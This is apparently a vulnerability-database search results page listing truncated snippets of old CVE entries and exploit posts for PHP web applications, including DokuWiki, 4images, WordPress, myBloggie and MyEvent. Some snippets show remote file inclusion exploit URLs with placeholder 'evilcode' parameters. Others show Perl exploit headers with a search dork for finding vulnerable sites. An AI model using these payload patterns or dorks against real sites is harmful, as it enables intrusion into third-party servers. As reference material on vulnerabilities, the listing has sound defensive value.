CVE-2012-0283

DokuWiki vulnerability CVE-2012-0283: XSS in tpl_mediaFileList (inc/template.php) allows injection via the ns parameter in medialist action to lib/exe/ajax.php. Affected: DokuWiki releases prior to 2012-01-25b; exploit could deliver arbitrary HTML/script. Remediation: upgrade to the latest DokuWi...

4images 1.7.6 > 9 Csrf inject php code

Exploit for php platform in category web applications !/usr/bin/perl Title : 4images 1.7.6 9 Csrf inject php code Author : Or4nG.M4n Version : 1.7.6 9 Homepage : http://www.4homepages.de/ Dork : "Powered by 4images" video : http://youtu.be/NYFzC9hH54 Thnks+----------------------------------+ | xS...

4Images 1.7.6-9 - Cross-Site Request Forgery PHP Code Injection

4Images 1.7.6-9 - Cross-Site Request Forgery PHP Code Injection !/usr/bin/perl Title : 4images 1.7.6 9 Csrf inject php code Author : Or4nG.M4n Version : 1.7.6 9 Homepage : http://www.4homepages.de/ Dork : "Powered by 4images" video : http://youtu.be/NYFzC9hH54...

4Images 1.7.6 Cross Site Request Forgery

!/usr/bin/perl Title : 4images 1.7.6 9 Csrf inject php code Author : Or4nG.M4n Version : 1.7.6 9 Homepage : http://www.4homepages.de/ Dork : "Powered by 4images" video : http://youtu.be/NYFzC9hH54 Thnks+----------------------------------+ | xSs m4n i-Hmx h311c0d3 |.sp. abo.B4sil | HcJ Cyb3r...

CVE-2011-3745

HycusCMS 1.0.3 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by templates/hycustemplate/template.php...

Wordpress 3.2.1 Core Module(post-template.php) Improper Sanitizing XSS

Exploit for php platform in category web applications Exploit Title : Wordpress 3.2.1 Core Modulepost-template.php Improper SanitizingPersistent Cross Site Scripting Vulnerability Author : Darshit Ashara Date : 21/08/2011 Vendor : Wordpress Version: 3.2.1 Software Link...

Uigaproxy Remote File Inclusion

coded by ahmadbady //=========================================================================== // Topic : uigaproxy // Bug type : remote file include // Download : http://www.scriptdevelopers.net/download/uigaproxy.zip // Advisory :...

CVE-2010-1216

The CVE-2010-1216 entry concerns PHP remote file inclusion in notsoPureEdit prior to or including version 1.4.1, triggered when register_globals is enabled. The vulnerability allows an attacker to execute arbitrary PHP code by supplying a URL in the content parameter, via a crafted request to tem...

NotSopureEdit <= 1.4.1 Remote File Include Vulnerability

======================================================== NotSopureEdit = 1.4.1 Remote File Include Vulnerability ======================================================== + NotSopureEdit = 1.4.1 Remote File Include Vulnerability...

WordPress <2.0.6 Template.php 跨站脚本攻击漏洞

No description provided by source...

CVE-2008-5860

Directory traversal vulnerability in backend/template.php in Constructr CMS 3.02.5 and earlier, when registerglobals is enabled and magicquotesgpc is disabled, allows remote attackers to create or read arbitrary files via directory traversal sequences in the editfile parameter...

Directory traversal

Directory traversal vulnerability in backend/template.php in Constructr CMS 3.02.5 and earlier, when registerglobals is enabled and magicquotesgpc is disabled, allows remote attackers to create or read arbitrary files via directory traversal sequences in the editfile parameter...

CVE-2008-5860

Directory traversal vulnerability in backend/template.php in Constructr CMS 3.02.5 and earlier, when registerglobals is enabled and magicquotesgpc is disabled, allows remote attackers to create or read arbitrary files via directory traversal sequences in the editfile parameter...

ezringtone-disclose.txt

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + Ez Ringtone Manager Multiple Vulnerabilities + + + + Discovered by b3hz4d + + + + WwW.DeltaHacking.Net + + + + + + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ APA Center of Yazd University...

Ez Ringtone Manager Multiple Remote File Disclosure Vulnerabilities

Exploit for unknown platform in category web applications =================================================================== Ez Ringtone Manager Multiple Remote File Disclosure Vulnerabilities =================================================================== AUTHOR : b3hz4d Seyed Behzad...

Chupix CMS 0.2.3 - &#039;repertoire&#039; Remote File Inclusion

chupix 0.2.3 /admin/include/header.php RFI f0und by 0in contact: [email protected] Greetings to:Die-angel,Slim,Joker186,Kaja,Artysta,wojto111,reydex team:Our Dark-Coders team; --------------------------------------------------------------------------------------------------------------------...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in myBloggie 2.1.5 allow remote attackers to execute arbitrary PHP code via a URL in the bloggierootpath parameter to 1 config.php; 2 db.php, 3 template.php, 4 functions.php, and 5 classes.php in includes/; 6 viewmode.php; and 7 blogbody.php. NOT...

mybloggie-rfi.txt

myBloggie 2.1.5 RFI Author: Yaser Homepage: http://www.ayyildiz.org Download S : http://mywebland.com/download.php?id=19 Exploits: http://site/config.php?bloggierootpath=evilcode? http://site/includes/db.php?bloggierootpath=evilcode? http://site/includes/template.php?bloggierootpath=evilcode?...

MyEvent1.6 &#40;template.php&#41; Remote File Inclusion Vulnerability

MyEvent1.6 template.php Remote File Inclusion Vulnerability Author: Yaser [email protected] Homepage: http://www.ayyildiz.org Download S : http://mywebland.com/download.php?id=6 ERROR: includeonce$myeventpath.'includes/template.php' Exploit: http://site/PaTh/includes/template.php?myeventpath=she...

Directory traversal

Multiple directory traversal vulnerabilities in Scallywag 2005-04-25 allow remote attackers to include and execute arbitrary local files via a .. dot dot in the skinname parameter to template.php in 1 skin/dark/, 2 skin/gold/, or 3 skin/original/, a different vector than CVE-2007-2900. NOTE: the...